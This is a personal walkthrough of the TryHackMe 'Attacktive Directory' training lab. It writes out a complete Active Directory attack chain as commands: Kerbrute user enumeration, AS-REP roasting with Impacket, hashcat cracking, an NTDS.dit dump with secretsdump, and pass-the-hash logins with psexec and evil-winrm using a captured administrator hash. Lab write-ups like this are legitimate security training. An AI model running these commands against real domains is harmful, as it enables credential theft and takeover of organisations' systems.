TryHackMe Attacktive Directory

TryHackMe Attacktive Directory

This room was great at understanding how abuse Kerberos a key authentication service within Active Directory. Tools such as Impacket, Kerbrute, and Evil-WinRm were also big wins while completing this THM room!

sudo nmap -sS -sC -sV -O -A -vvv -oA THM-ATTACKTIVE-Directory 10.10.58.99

Text Description automatically generated

Generating HTML Nmap Reports

xsltproc THM-ATTACKTIVE-Directory.xml -o THM_Attacktive_Directory_nmap-output.html

  • Creating HTML reports may help to better visualize your target scans. Some may also find it useful to observe these scans through CLI… user preference I guess...

Service Brute Force “Kerbrute”

Download Kerbrute and chmod +x

https://github.com/ropnop/kerbrute/releases/tag/v1.0.3

When using Kerbrute choose a user and password list that is suitable for this type of attack. Keep in mind that brute forcing accounts could have adverse effects on the target.

Examples:

sudo nano user.txt

  • Adam

  • Sam

  • Bob

sudo nano password.txt

  • Password

  • Password123

  • Mypassword

In our past scan, we found the DNS for our target. It’s best to configure /etc/hosts file with IP and DNS name.

You can use spooksec.local as well when configuring your hosts file for IP name resolution.

successful reply

Successful ping using DNS name!

Now let’s use Kerbrute with a few flags and switches

sudo ./kerbrute_linux_amd64 userenum --dc spookysec.local -d spookysec.local user.txt

Next, we’ll use Impacket-GetNPUsers and target [email protected]

Website Reference: https://wadcoms.github.io/wadcoms/Impacket-GetNPUsers/

Syntax used:

impacket-GetNPUsers spookysec.local/ -dc-ip 10.10.58.99 -usersfile svc-admin.txt -format hashcat -outputfile hashes.txt

Success!!

Looks like we have a Kerberos 5, etype 23, AS-REP hash in 18200 mode

Reference: https://hashcat.net/wiki/doku.php?id=example_hashes

Let’s crack it. Reference site below

https://hackernfo.com/hacking/PasswordCracking/

Syntax:

hashcat -a 0 -m 18200 svc-admin-hash.txt password.txt

Now we have the service account and the password!!

Let’s use Smbclient with username and password to list shares

We have found some interesting share files. Let’s connect and enumerate more information from backup share!

Now that we have backup account creds and svc-admin creds its time to priv-esc and grab the NTDS.dit file using “Impacket-SecretsDump

impacket-secretsdump -outputfile dc-dump.txt spookysec.local/backup:[email protected]

We can also use Impacket-PsExec to PTH and authenticate to the DC remotely!!

Bingo!!

impacket-psexec -hashes 00000000000000000000000000000000:0e0363213e37b94221497260b0bcb4fc [email protected]

Another tool we can use is Evil-WinRm with Admin Hash to remotely authenticate to the DCas seen below.

evil-winrm -i spookysec.local -u administrator -H 0e0363213e37b94221497260b0bcb4fc

Looks like we owned the DC. Hope these notes helped!

PreviousHack the Box LaboratoryNextTryHackMe Steel Mountain

Last updated

Was this helpful?